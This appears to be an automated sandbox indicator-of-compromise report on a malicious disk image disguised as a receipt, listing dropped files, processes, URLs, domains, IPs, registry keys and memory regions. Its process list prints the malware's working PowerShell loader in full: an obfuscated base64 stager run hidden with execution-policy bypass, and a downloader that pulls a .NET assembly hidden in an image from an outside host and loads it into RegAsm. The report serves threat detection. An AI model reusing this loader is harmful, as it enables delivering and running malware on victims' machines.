IOC Report
Hapril-29-receipt.img

Files

File Path | Type | Category | Malicious
Hapril-29-receipt.img | UDF filesystem data (version 1.5) 'DOCUMENTS' | initial sample | malicious
C:\ProgramData\lampiro.vbs | Unicode text, UTF-16, little-endian text, with CRLF line terminators | dropped | malicious
\Device\CdRom1\Hapril-29-receipt.vbs | Unicode text, UTF-16, little-endian text, with CRLF line terminators | dropped | malicious
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | Extensible storage engine DataBase, version 0x620, checksum 0xfd883c9f, page size 16384, DirtyShutdown, Windows version 10.0 | dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log | ASCII text, with CRLF line terminators | dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nDU16UcU[1].txt | Unicode text, UTF-8 text, with very long lines (11140), with CRLF line terminators | dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped
C:\Users\user\AppData\Local\Temp\Log.tmp | ASCII text, with CRLF line terminators | modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0d0st2mh.wkv.psm1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1s5o2bkg.lgk.psm1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ukcvm5r.nv4.ps1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5wz3lnap.lsg.ps1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_au4exap5.etw.psm1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ei2c2cgm.rlt.ps1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ga2hrp2e.fog.psm1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gk3hepqp.tnt.psm1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4goklyr.yjg.ps1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iuyyn5ag.tu2.ps1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5s2ufuf.4ye.ps1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lo3plort.lxg.psm1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_micukkxd.ajy.psm1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uakobb2k.d3g.ps1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xepax0lv.wte.ps1 | ASCII text, with no line terminators | dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z24asuwr.pjm.psm1 | ASCII text, with no line terminators | dropped
C:\Users\user\Desktop\tmp.log | ASCII text, with CRLF line terminators | dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp | JSON data | dropped
Chrome Cache Entry: 88 | ASCII text, with very long lines (767) | downloaded
\Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON | data | dropped
\Device\Mup\user-PC\PIPE\samr | GLS_BINARY_LSB_FIRST | dropped
\Device\Mup\user-PC\PIPE\wkssvc | GLS_BINARY_LSB_FIRST | dropped
\Device\Mup\MQAWXUY*\MAILSLOT\NET\NETLOGON | data | dropped

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "E:\Hapril-29-receipt.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/pa/gro.ecneicslanoitapuccoj//:sptth' , '1' , 'C:\ProgramData\' , 'lampiro','RegAsm',''))} }"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\lampiro.vbs"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\lampiro.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\lampiro.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/pa/gro.ecneicslanoitapuccoj//:sptth' , '1' , 'C:\ProgramData\' , 'lampiro','RegAsm',''))} }"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/pa/gro.ecneicslanoitapuccoj//:sptth' , '1' , 'C:\ProgramData\' , 'lampiro','RegAsm',''))} }"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://473750571567004317064230583514468350804565684324378075159610742091604698238217701484029465762430135913242023857750034401559054060945654540273638867228794983640833862748912121851334807031249099092790952130035074227943842970399582505875/
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2272,i,15907534759869138173,17011643453597884883,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1868,i,7095036941938061021,10836526320187100549,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name | IP | Malicious
http://pesterbdd.com/images/Pester.png | unknown | malicious
aprilxrwonew8450.duckdns.org |  | malicious
https://uploaddeimagens.c | unknown | malicious
https://uploaddeimagens.com.br | unknown | malicious
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029 | 104.21.45.138 | malicious
https://joccupationalscience.org/ap/xwapri.txt | 185.184.154.17 | malicious
http://app01.system.com.br/RDWeb/Pages/login.aspxF | unknown
http://nuget.org/NuGet.exe | unknown
https://pastebin.com/raw/nDU16UcU2H8 | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | unknown
http://joccupationalscience.org | unknown
http://app01.system.com.br/RDWeb/Pages/login.aspxlp_G | unknown
https://pastebin.com/raw/nDU16UcU | 172.67.19.24
https://contoso.com/License | unknown
https://pastebin.com/raw/nDU16UcUicLMEMH | unknown
http://app01.system.com.br/RDWeb/Pages/login.aspx; | unknown
https://contoso.com/Icon | unknown
https://g.live.com/odclientsettings/ProdV2.C: | unknown
https://pastebin.com/raw/nDU16UcU(H. | unknown
https://www.google.com/async/newtab_promos | 142.250.190.36
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGMmbv7EGIjA1M1nVZLAVtFVS1FJZIi_5LMmPbtWOrECDQwQLeRMtMGkTzIEOrMpTy5uPF0ejBXoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | 142.250.190.36
https://github.com/Pester/Pester | unknown
https://pastebin.com/raw/nDU | unknown
http://app01.system.com.br/RDWeb/Pages/login.aspxd | unknown
https://g.live.com/odclientsettings/Prod.C: | unknown
https://pastebin.com/raw/nDU16UcUj | unknown
https://g.live.com/odclientsettings/ProdV2 | unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw | 142.250.190.36
http://crl.micro | unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96 | unknown
https://aka.ms/pscore6lB | unknown
https://contoso.com/ | unknown
https://nuget.org/nuget.exe | unknown
https://joccupationalscience.org | unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 | 142.250.190.36
https://aka.ms/pscore68 | unknown
https://pastebin.com/raw/nDU16UcUy1 | unknown
https://pastebin.com/ | unknown
https://pastebin.com/raw/nDU16UcUC: | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown
http://app01.system.com.br/RDWeb/Pages/login.aspx | unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6 | unknown
https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGMmbv7EGIjDxSar4WO0-S0uWb0H8SKABZOs27vCm-xkEEvvoD9N2_qL9rmpaRiHRZ6EwWKo7rWEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM | 142.250.190.36

Domains

Name | IP | Malicious
aprilxrwonew8450.duckdns.org | 12.221.146.138 | malicious
joccupationalscience.org | 185.184.154.17 | malicious
uploaddeimagens.com.br | 104.21.45.138 | malicious
www.google.com | 142.250.190.36
pastebin.com | 172.67.19.24

IPs

IP | Domain | Country | Malicious
104.21.45.138 | uploaddeimagens.com.br | United States | malicious
192.168.2.4 | unknown | unknown | malicious
12.221.146.138 | aprilxrwonew8450.duckdns.org | United States | malicious
185.184.154.17 | joccupationalscience.org | United Kingdom | malicious
142.250.190.36 | www.google.com | United States
239.255.255.250 | unknown | Reserved
172.67.19.24 | pastebin.com | United States
127.0.0.1 | unknown | unknown

Registry

Path | Value | Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Path | malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS | PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing | EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS | EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS | FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory

Memdumps

Base Address
Regiontype
Protect
Malicious
21900000000
trusted library section
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
835E000
trusted library allocation
page read and write
malicious
7EE0000
trusted library allocation
page read and write
18712219000
heap
page read and write
B241000
trusted library allocation
page read and write
55FB000
heap
page read and write
1314000
trusted library allocation
page read and write
4BE4000
heap
page read and write
1BB7B7F000
stack
page read and write
46DE000
stack
page read and write
4C01000
heap
page read and write
2940000
trusted library allocation
page read and write
830000
heap
page read and write
5440000
trusted library allocation
page read and write
5594000
heap
page read and write
4740000
heap
page execute and read and write
817000
heap
page read and write
36A3000
trusted library allocation
page execute and read and write
373E000
stack
page read and write
544E000
stack
page read and write
187122BE000
heap
page read and write
67DD000
stack
page read and write
2132B928000
trusted library allocation
page read and write
50C0000
remote allocation
page read and write
720000
heap
page read and write
6AE4EFF000
stack
page read and write
6AE51FF000
stack
page read and write
1BB7D7E000
stack
page read and write
DA0000
heap
page read and write
1E29AD2C000
heap
page read and write
1E29CA0E000
heap
page read and write
70B0000
trusted library allocation
page read and write
298D000
stack
page read and write
1E29AD1F000
heap
page read and write
377E000
stack
page read and write
1E29CA02000
heap
page read and write
7260000
trusted library allocation
page read and write
18714DB9000
heap
page read and write
1F9E745000
stack
page read and write
75E000
heap
page read and write
4BE8000
heap
page read and write
446E000
stack
page read and write
1871432A000
heap
page read and write
4C1E000
heap
page read and write
26B0000
heap
page read and write
1E29CA2E000
heap
page read and write
187142D6000
heap
page read and write
27CE000
stack
page read and write
509E000
stack
page read and write
1E29CA28000
heap
page read and write
187122A6000
heap
page read and write
56E0000
heap
page read and write
7C7000
heap
page read and write
7EC0000
trusted library allocation
page read and write
37B0000
heap
page read and write
1E29ADD0000
heap
page read and write
219409D7000
trusted library allocation
page read and write
2132B8E3000
trusted library allocation
page read and write
6AE4715000
stack
page read and write
1E29CD96000
heap
page read and write
D241000
trusted library allocation
page read and write
187142BD000
heap
page read and write
C70000
heap
page read and write
7E80000
trusted library allocation
page read and write
5310000
heap
page read and write
55CD000
heap
page read and write
6FF2000
heap
page read and write
4BEF000
heap
page read and write
3560000
heap
page read and write
2193E64B000
heap
page read and write
5F5E000
heap
page read and write
D7E5000
trusted library allocation
page read and write
1E29AD56000
heap
page read and write
8950000
trusted library allocation
page read and write
21942849000
trusted library allocation
page read and write
4FEE000
stack
page read and write
352E000
stack
page read and write
1E29CCE0000
heap
page read and write
1E29CD96000
heap
page read and write
1E29ADAA000
heap
page read and write
5DB8000
heap
page read and write
1871226F000
heap
page read and write
7220000
trusted library allocation
page read and write
1E29ADE2000
heap
page read and write
18713CC0000
heap
page read and write
219404A0000
heap
page execute and read and write
2132B8E0000
trusted library allocation
page read and write
55A3000
heap
page read and write
1330000
trusted library allocation
page read and write
18714DB9000
heap
page read and write
469C000
stack
page read and write
2194184D000
trusted library allocation
page read and write
18714BF8000
heap
page read and write
2816000
heap
page read and write
7006000
heap
page read and write
219404A7000
heap
page execute and read and write
34EE000
stack
page read and write
504E000
stack
page read and write
2930000
trusted library allocation
page read and write
13F0000
heap
page read and write
1871404E000
heap
page read and write
521F000
stack
page read and write
7F00000
trusted library allocation
page read and write
2132B8B2000
trusted library allocation
page read and write
55E2000
heap
page read and write
263C000
stack
page read and write
55FB000
heap
page read and write
55FB000
heap
page read and write
2193E63F000
heap
page read and write
18714420000
heap
page read and write
18714DC2000
heap
page read and write
53B3000
heap
page read and write
1243000
heap
page read and write
553E000
stack
page read and write
2194204B000
trusted library allocation
page read and write
679F000
stack
page read and write
50EF000
stack
page read and write
7BD0000
heap
page read and write
7C7C000
heap
page read and write
7CA0000
heap
page read and write
5E5D000
heap
page read and write
5DB1000
heap
page read and write
18714DCA000
heap
page read and write
1E29D6A9000
heap
page read and write
6579000
trusted library allocation
page read and write
1E29CA05000
heap
page read and write
7FC9000
heap
page read and write
4C1B000
heap
page read and write
5772000
trusted library allocation
page read and write
2965000
trusted library allocation
page execute and read and write
6551000
trusted library allocation
page read and write
70D0000
trusted library allocation
page execute and read and write
187142C9000
heap
page read and write
7EB0000
trusted library allocation
page read and write
187121EA000
heap
page read and write
1E29CA2E000
heap
page read and write
18714C39000
heap
page read and write
835000
heap
page read and write
2A1D000
heap
page read and write
2193E609000
heap
page read and write
1871226D000
heap
page read and write
6FA9000
heap
page read and write
29B0000
heap
page read and write
18712249000
heap
page read and write
103E000
stack
page read and write
36B0000
trusted library allocation
page read and write
55FB000
heap
page read and write
1E29D1E0000
trusted library allocation
page read and write
E90000
trusted library allocation
page read and write
7A9000
heap
page read and write
7050000
trusted library allocation
page read and write
1E29AD2F000
heap
page read and write
21326B1A000
heap
page read and write
21326B1B000
heap
page read and write
187121C0000
heap
page read and write
1871435B000
heap
page read and write
21940611000
trusted library allocation
page read and write
29A0000
trusted library allocation
page execute and read and write
187142E6000
heap
page read and write
472E000
stack
page read and write
18714021000
heap
page read and write
1E29ADA0000
heap
page read and write
1E29CE90000
heap
page read and write
1E29CC80000
remote allocation
page read and write
1F9EEFE000
stack
page read and write
2132B9A0000
trusted library allocation
page read and write
3597000
heap
page read and write
1871224B000
heap
page read and write
18714DD7000
heap
page read and write
5510000
trusted library allocation
page read and write
7280000
trusted library allocation
page read and write
293D000
trusted library allocation
page execute and read and write
2132B6F2000
heap
page read and write
6AE4DFF000
stack
page read and write
54BF000
stack
page read and write
2193E688000
heap
page read and write
B269CFE000
stack
page read and write
7A9000
heap
page read and write
18714328000
heap
page read and write
4745000
heap
page execute and read and write
55CD000
heap
page read and write
A4D000
stack
page read and write
5769000
trusted library allocation
page read and write
1E29D7A8000
heap
page read and write
C3B000
heap
page read and write
2132B841000
trusted library allocation
page read and write
50C0000
heap
page read and write
7C79000
heap
page read and write
1E29CDB1000
heap
page read and write
58E6000
trusted library allocation
page read and write
4C01000
heap
page read and write
4FF5000
heap
page execute and read and write
1BB7BFF000
stack
page read and write
18714D79000
heap
page read and write
B26A0FE000
stack
page read and write
1E29CD20000
heap
page read and write
18714BE1000
heap
page read and write
689E000
stack
page read and write
4C01000
heap
page read and write
5E5C000
heap
page read and write
1E29D6A9000
heap
page read and write
55B7000
heap
page read and write
7240000
trusted library allocation
page read and write
1E29CDB8000
heap
page read and write
18714DCF000
heap
page read and write
E83000
trusted library allocation
page execute and read and write
1313000
trusted library allocation
page execute and read and write
792000
heap
page read and write
750000
heap
page read and write
1871404E000
heap
page read and write
B269732000
stack
page read and write
21941C4D000
trusted library allocation
page read and write
7F40000
trusted library allocation
page read and write
81D000
heap
page read and write
18712241000
heap
page read and write
76A000
heap
page read and write
5E5C000
heap
page read and write
1E29D5E0000
heap
page read and write
5592000
heap
page read and write
337E000
stack
page read and write
D10000
heap
page read and write
810000
heap
page read and write
1E29CD5F000
heap
page read and write
5596000
heap
page read and write
5000000
trusted library allocation
page read and write
7230000
trusted library allocation
page read and write
1871404B000
heap
page read and write
18714260000
heap
page read and write
4FE0000
trusted library allocation
page execute and read and write
55BA000
trusted library allocation
page read and write
1E29CA1A000
heap
page read and write
4C01000
heap
page read and write
1E29D1D0000
heap
page read and write
B26A17B000
stack
page read and write
7F9000
heap
page read and write
187142BF000
heap
page read and write
1E29AD78000
heap
page read and write
1871404E000
heap
page read and write
1E29CA00000
heap
page read and write
7C7F000
heap
page read and write
18714475000
heap
page read and write
4ADF000
stack
page read and write
819000
heap
page read and write
2678000
stack
page read and write
1E29CDC2000
heap
page read and write
187121C8000
heap
page read and write
1E29CD98000
heap
page read and write
2132B8AC000
trusted library allocation
page read and write
31B000
stack
page read and write
29B7000
heap
page read and write
55E9000
heap
page read and write
18714C11000
heap
page read and write
1E4003CE000
trusted library allocation
page read and write
54CE000
stack
page read and write
4BE2000
heap
page read and write
18714DBA000
heap
page read and write
793000
heap
page read and write
7A9000
heap
page read and write
1E29CA28000
heap
page read and write
18714067000
heap
page read and write
6AE50FD000
stack
page read and write
7870000
heap
page read and write
1E29D7A8000
heap
page read and write
681E000
stack
page read and write
18714340000
heap
page read and write
2949000
trusted library allocation
page read and write
55E2000
heap
page read and write
7EF0000
trusted library allocation
page read and write
7D9E000
stack
page read and write
29E0000
trusted library allocation
page read and write
18714BE0000
heap
page read and write
7C7000
heap
page read and write
18714D3D000
heap
page read and write
21940040000
heap
page readonly
4C01000
heap
page read and write
18714C91000
heap
page read and write
3690000
trusted library allocation
page read and write
295A000
trusted library allocation
page execute and read and write
49C1000
trusted library allocation
page read and write
1E29AC00000
heap
page read and write
5595000
heap
page read and write
1BB7DFE000
stack
page read and write
1E29AD3D000
heap
page read and write
1871403C000
heap
page read and write
7270000
trusted library allocation
page read and write
2132B8FA000
trusted library allocation
page read and write
C241000
trusted library allocation
page read and write
44A0000
heap
page read and write
18714047000
heap
page read and write
18714035000
heap
page read and write
1E29CD85000
heap
page read and write
7C18000
heap
page read and write
1E29AD1F000
heap
page read and write
5F5E000
heap
page read and write
2193FFD0000
heap
page read and write
2957000
trusted library allocation
page execute and read and write
B269F7E000
stack
page read and write
187142C5000
heap
page read and write
800000
heap
page read and write
2A2D000
heap
page read and write
28D0000
heap
page read and write
4BF0000
heap
page read and write
568E000
heap
page read and write
18714DBD000
heap
page read and write
4C22000
heap
page read and write
187142C4000
heap
page read and write
18714025000
heap
page read and write
18712241000
heap
page read and write
1E29AD2A000
heap
page read and write
C64000
heap
page read and write
B26AB4E000
stack
page read and write
120E000
stack
page read and write
2A23000
heap
page read and write
5F77000
heap
page read and write
2132B8A4000
trusted library allocation
page read and write
2132B9E0000
remote allocation
page read and write
54F0000
heap
page read and write
4BE9000
heap
page read and write
5591000
heap
